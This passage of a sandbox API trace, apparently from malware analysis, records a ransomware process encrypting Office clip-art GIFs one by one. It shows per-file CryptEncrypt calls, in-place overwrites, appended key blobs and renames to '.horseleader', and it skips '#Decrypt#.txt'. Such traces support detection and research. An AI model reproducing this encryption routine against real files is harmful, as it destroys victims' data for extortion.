nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.480] CloseHandle (hObject=0x158) returned 1 [0252.480] GetProcessHeap () returned 0x780000 [0252.480] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 
[0252.481] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.horseleader") returned 79 [0252.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif.horseleader")) returned 1 [0252.482] GetProcessHeap () returned 0x780000 [0252.482] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.482] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2417b00, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb2417b00, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00157_.GIF", cAlternateFileName="")) returned 1 [0252.482] lstrcmpiW (lpString1="AG00157_.GIF", lpString2="Windows") returned -1 [0252.482] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 67 [0252.482] StrStrIW (lpFirst="AG00157_.GIF", lpSrch=".horseleader") returned 0x0 [0252.482] lstrcmpW (lpString1="AG00157_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.482] lstrcmpW (lpString1="AG00157_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.482] lstrlenW (lpString=".testttjffg") returned 11 [0252.483] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF", lpSrch=".testttjffg") 
returned 0x0 [0252.483] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.483] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.483] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.483] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 67 [0252.484] StrStrW (lpFirst="AG00157_.GIF", lpSrch=".txt") returned 0x0 [0252.484] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4955) returned 1 [0252.484] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x135b, lpOverlapped=0x0) returned 1 [0252.486] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffeca5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.486] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x135b, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x135b, lpOverlapped=0x0) returned 1 [0252.487] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.487] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, 
lpOverlapped=0x0) returned 1 [0252.487] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.487] CloseHandle (hObject=0x158) returned 1 [0252.488] GetProcessHeap () returned 0x780000 [0252.488] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.488] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.horseleader") returned 79 [0252.488] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif.horseleader")) returned 1 [0252.489] GetProcessHeap () returned 0x780000 [0252.489] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.489] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad7cc700, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad7cc700, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x13a6, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00158_.GIF", cAlternateFileName="")) returned 1 [0252.489] lstrcmpiW (lpString1="AG00158_.GIF", lpString2="Windows") returned -1 [0252.489] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 
67 [0252.489] StrStrIW (lpFirst="AG00158_.GIF", lpSrch=".horseleader") returned 0x0 [0252.489] lstrcmpW (lpString1="AG00158_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.490] lstrcmpW (lpString1="AG00158_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.490] lstrlenW (lpString=".testttjffg") returned 11 [0252.490] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.490] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.490] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.490] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.491] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 67 [0252.491] StrStrW (lpFirst="AG00158_.GIF", lpSrch=".txt") returned 0x0 [0252.491] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5030) returned 1 [0252.491] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x13a6, lpOverlapped=0x0) returned 1 [0252.493] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffec5a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.494] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x13a6, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x13a6, lpOverlapped=0x0) returned 1 [0252.494] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.494] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.494] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.495] CloseHandle (hObject=0x158) returned 1 [0252.495] GetProcessHeap () returned 0x780000 [0252.495] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.495] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.horseleader") returned 79 [0252.495] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif.horseleader")) returned 1 [0252.496] GetProcessHeap () returned 0x780000 [0252.496] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.496] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a69f700, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9a69f700, 
ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x47a, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00160_.GIF", cAlternateFileName="")) returned 1 [0252.496] lstrcmpiW (lpString1="AG00160_.GIF", lpString2="Windows") returned -1 [0252.496] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 67 [0252.496] StrStrIW (lpFirst="AG00160_.GIF", lpSrch=".horseleader") returned 0x0 [0252.496] lstrcmpW (lpString1="AG00160_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.497] lstrcmpW (lpString1="AG00160_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.497] lstrlenW (lpString=".testttjffg") returned 11 [0252.497] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.497] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.497] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.497] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.497] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 67 [0252.498] StrStrW (lpFirst="AG00160_.GIF", lpSrch=".txt") returned 0x0 [0252.498] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1146) returned 1 [0252.498] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x47a, lpOverlapped=0x0) returned 1 [0252.500] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb86, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.500] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x47a, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x47a, lpOverlapped=0x0) returned 1 [0252.500] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.500] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.500] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.500] CloseHandle (hObject=0x158) returned 1 [0252.500] GetProcessHeap () returned 0x780000 [0252.500] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.501] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.horseleader") returned 79 [0252.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif.horseleader")) returned 1 [0252.501] GetProcessHeap () returned 
0x780000 [0252.501] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.501] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a54300, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x95a54300, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x1d9f, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00161_.GIF", cAlternateFileName="")) returned 1 [0252.501] lstrcmpiW (lpString1="AG00161_.GIF", lpString2="Windows") returned -1 [0252.501] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 67 [0252.502] StrStrIW (lpFirst="AG00161_.GIF", lpSrch=".horseleader") returned 0x0 [0252.502] lstrcmpW (lpString1="AG00161_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.502] lstrcmpW (lpString1="AG00161_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.502] lstrlenW (lpString=".testttjffg") returned 11 [0252.502] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.502] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.502] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.502] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.502] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 67 [0252.502] StrStrW (lpFirst="AG00161_.GIF", lpSrch=".txt") returned 0x0 [0252.502] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7583) returned 1 [0252.503] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1d9f, lpOverlapped=0x0) returned 1 [0252.505] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe261, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.505] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1d9f, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1d9f, lpOverlapped=0x0) returned 1 [0252.505] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.505] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.505] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.505] CloseHandle (hObject=0x158) returned 1 [0252.505] GetProcessHeap () returned 0x780000 [0252.505] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.505] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.horseleader") returned 79 
[0252.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif.horseleader")) returned 1 [0252.506] GetProcessHeap () returned 0x780000 [0252.506] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.506] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65e47e00, ftCreationTime.dwHighDateTime=0x1bd4e52, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x65e47e00, ftLastWriteTime.dwHighDateTime=0x1bd4e52, nFileSizeHigh=0x0, nFileSizeLow=0x1b48, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00163_.GIF", cAlternateFileName="")) returned 1 [0252.506] lstrcmpiW (lpString1="AG00163_.GIF", lpString2="Windows") returned -1 [0252.506] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 67 [0252.506] StrStrIW (lpFirst="AG00163_.GIF", lpSrch=".horseleader") returned 0x0 [0252.506] lstrcmpW (lpString1="AG00163_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.507] lstrcmpW (lpString1="AG00163_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.507] lstrlenW (lpString=".testttjffg") returned 11 [0252.507] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.507] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.507] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.507] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.508] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 67 [0252.508] StrStrW (lpFirst="AG00163_.GIF", lpSrch=".txt") returned 0x0 [0252.508] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6984) returned 1 [0252.508] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1b48, lpOverlapped=0x0) returned 1 [0252.510] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe4b8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.510] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1b48, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1b48, lpOverlapped=0x0) returned 1 [0252.510] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.511] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.511] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.511] CloseHandle (hObject=0x158) returned 1 [0252.511] GetProcessHeap () returned 0x780000 [0252.511] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.511] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.horseleader") returned 79 [0252.511] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif.horseleader")) returned 1 [0252.513] GetProcessHeap () returned 0x780000 [0252.513] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.513] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d4d0800, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8d4d0800, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x33c6, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00164_.GIF", cAlternateFileName="")) returned 1 [0252.513] lstrcmpiW (lpString1="AG00164_.GIF", lpString2="Windows") returned -1 [0252.513] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 67 [0252.513] StrStrIW (lpFirst="AG00164_.GIF", lpSrch=".horseleader") returned 0x0 [0252.513] lstrcmpW (lpString1="AG00164_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.513] lstrcmpW 
